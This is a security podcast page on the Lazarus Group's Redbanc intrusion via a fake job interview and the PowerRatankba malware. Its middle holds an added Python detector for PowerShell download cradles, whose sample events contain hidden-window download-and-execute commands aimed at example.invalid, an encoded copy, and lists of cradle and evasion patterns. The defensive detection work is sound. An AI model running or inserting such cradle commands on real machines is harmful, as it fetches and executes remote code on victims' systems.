Collective Intelligence Podcast, Vitali Kremez on Redbanc Attack and Lazarus Group
By Mike Mimoso
North Korea’s Lazarus Group has notoriously been linked to massive thefts of information and money since its 2014 attack against Sony Pictures Entertainment. These persistent, patient, and capable state-sponsored actors are best known for having stolen hundreds of millions of dollars from financial organizations in Bangladesh, Poland, Mexico, and elsewhere globally, allegedly to fund the group’s other activities.
The most recent intrusion attributed to the North Korean APT was disclosed earlier this month when officials at Chilean interbank network Redbanc confirmed an attack against their organization. Researchers at Flashpoint last week released a report explaining the connection between the PowerRatankba malware found on the Redbanc network and Lazarus.
In this episode of the Collective Intelligence podcast, Flashpoint Director of Research Vitali Kremez joins Editorial Director Mike Mimoso to discuss the incident and Flashpoint’s analysis of PowerRatankba.
The incident took place in December when a Redbanc developer used a company computer to answer a job listing via LinkedIn. The threat actors, realizing the opportunity, set up a Skype interview with the developer and, unusually for Lazarus, used a native Spanish speaker to conduct the call. During the call they sent the developer a link to a phony job-application file that was in reality a dropper; once run, it called out to the attackers’ infrastructure and downloaded PowerRatankba.
PowerRatankba, according to Flashpoint’s analysis, is a PowerShell reconnaissance tool that let the attackers collect system information while evading antivirus detection. The goal was to reach privileged users and the systems critical to Redbanc’s operations.
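The chain described above, a user-launched "job application" file spawning PowerShell that fetches a second stage, leaves a recognizable footprint in process-creation telemetry. The script below is an added example, not code from Flashpoint or from the podcast, that scores Sysmon-style process-creation events for that pattern: PowerShell started by an office/script host or by an executable in a user-writable path, combined with download-cradle and window-hiding switches. It also decodes `-EncodedCommand` arguments (base64 of UTF-16LE), which plain string matching on the command line would miss. The sample events, the `example.invalid` host, the file names and the indicator lists are all constructed for illustration; none of them are indicators from the Redbanc report.

```python
import base64
import re
from dataclasses import dataclass, field

# Constructed Sysmon-style process-creation records (hypothetical sample data,
# not telemetry from the Redbanc intrusion). The suspicious records model the
# chain described on the page: a file posing as a job application spawning
# PowerShell that fetches a second stage.
PLAINTEXT_PAYLOAD = (
    "(New-Object Net.WebClient).DownloadFile('http://example.invalid/r.ps1', "
    "'C:\\Users\\Public\\r.ps1')"
)
# PowerShell's -EncodedCommand takes base64 of UTF-16LE text, so the cradle
# keywords never appear verbatim on the command line.
ENCODED_PAYLOAD = base64.b64encode(PLAINTEXT_PAYLOAD.encode("utf-16le")).decode("ascii")

SAMPLE_EVENTS = [
    {"pid": 4012,
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "parent_image": "C:\\Users\\dev\\Downloads\\JobApplication.exe",
     "command_line": 'powershell.exe -NoP -NonI -W Hidden -Exec Bypass -c '
                     '"IEX (New-Object Net.WebClient).DownloadString(\'http://example.invalid/ps\')"'},
    {"pid": 4020,
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "parent_image": "C:\\Users\\dev\\Downloads\\JobApplication.exe",
     "command_line": "powershell.exe -NonI -enc " + ENCODED_PAYLOAD},
    {"pid": 5000,  # benign: an admin listing a directory from Explorer
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "parent_image": "C:\\Windows\\explorer.exe",
     "command_line": "powershell.exe Get-ChildItem C:\\Temp"},
    {"pid": 5100,  # not PowerShell at all
     "image": "C:\\Windows\\System32\\notepad.exe",
     "parent_image": "C:\\Windows\\explorer.exe",
     "command_line": "notepad.exe"},
]

# Generic download-and-execute ("cradle") indicators; not IOCs from the report.
CRADLE_PATTERNS = [
    r"Net\.WebClient", r"DownloadString", r"DownloadFile", r"Invoke-WebRequest",
    r"\biwr\b", r"Invoke-Expression", r"\biex\b", r"Start-BitsTransfer",
    r"FromBase64String",
]
# Switches that hide the window or disable policy/profile; weak signals alone.
EVASION_PATTERNS = [
    r"-w(indowstyle)?\s+hidden", r"-(ep|exec|executionpolicy)\s+bypass",
    r"-nop(rofile)?\b", r"-noni(nteractive)?\b",
]
# Parents that should rarely spawn PowerShell in an ordinary user session.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "wscript.exe",
                      "cscript.exe", "mshta.exe"}
USER_WRITABLE_DIRS = ("\\users\\", "\\appdata\\", "\\temp\\", "\\downloads\\")

# Matches -e/-ec/-en/-enc/-encodedcommand followed by a base64 blob. PowerShell
# accepts any unambiguous prefix, so extend the group if telemetry shows others;
# {20,} avoids treating short arguments as a payload.
ENC_RE = re.compile(r"-e(?:c|nc?|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE)


@dataclass
class Finding:
    pid: int
    score: int
    reasons: list = field(default_factory=list)


def decode_encoded_command(command_line):
    """Return the decoded -EncodedCommand payload, or None if absent or invalid."""
    m = ENC_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):  # bad base64 or odd byte count
        return None


def analyze_event(event):
    """Score one process-creation event; None if it is not a PowerShell launch."""
    image_name = event["image"].rsplit("\\", 1)[-1].lower()
    if image_name not in ("powershell.exe", "pwsh.exe"):
        return None
    cmd = event["command_line"]
    finding = Finding(pid=event["pid"], score=0)
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        finding.score += 2
        finding.reasons.append("encoded command: " + decoded[:60])
    # Scan the command line minus the base64 blob, plus its decoded form, so the
    # blob itself cannot trigger (or hide) a keyword match.
    text = ENC_RE.sub(" ", cmd) + ("\n" + decoded if decoded is not None else "")
    for pat in CRADLE_PATTERNS:
        if re.search(pat, text, re.IGNORECASE):
            finding.score += 3
            finding.reasons.append("download/exec cradle: " + pat)
    for pat in EVASION_PATTERNS:
        if re.search(pat, cmd, re.IGNORECASE):
            finding.score += 1
            finding.reasons.append("evasion switch: " + pat)
    parent = event["parent_image"].lower()
    parent_name = parent.rsplit("\\", 1)[-1]
    if parent_name in SUSPICIOUS_PARENTS:
        finding.score += 3
        finding.reasons.append("script/office host parent: " + parent_name)
    elif any(d in parent for d in USER_WRITABLE_DIRS):
        finding.score += 3
        finding.reasons.append("parent runs from user-writable path: " + parent)
    return finding


def detect(events, threshold=5):
    """Return findings at or above threshold, in event order."""
    return [f for f in (analyze_event(ev) for ev in events)
            if f is not None and f.score >= threshold]


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"pid {f.pid} score {f.score}")
        for r in f.reasons:
            print("  -", r)
```

Run stand-alone, the script flags the two PowerShell launches spawned by the downloaded executable and ignores the Explorer-launched directory listing. The parent-process check is what carries the signal here: a download cradle on its own also appears in legitimate admin tooling, but PowerShell started by an unsigned binary in a user's Downloads folder, with a hidden window and a network fetch, is the combination worth paging on. The weights are illustrative and should be tuned against an organization's own baseline of PowerShell use.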
Vitali and Mike discuss the intricacies of the malware, Lazarus Group’s focus on stealing money, the difficulties associated with attribution in incidents such as this one, as well as mitigation strategies and recommendations for financial institutions.
The Collective Intelligence Podcast, presented by Flashpoint and hosted by Editorial Director Mike Mimoso, features regular interviews with a diverse set of industry experts and Flashpoint analysts on the latest information security news and industry trends.
Michael Mimoso brings over a decade of experience in IT security news reporting to Flashpoint. As Editorial Director, he collaborates with marketing, analyst, and leadership teams to share the company’s story. Prior to Flashpoint, Mike was an Editor at Threatpost, where he covered security issues and cybercrime affecting businesses and end-users.
Prior to joining Threatpost, Mike was Editorial Director of the Security Media Group at TechTarget and Editor of Information Security magazine where he won several ASBPE national and regional writing awards. In addition, Information Security was a two-time finalist for national magazine of the year. He has been writing for business-to-business IT publications for 11 years, with a primary focus on information security.
Earlier in his career, Mike was an editor and reporter at several Boston-area newspapers. He holds a bachelor’s degree from Stonehill College in North Easton, Massachusetts.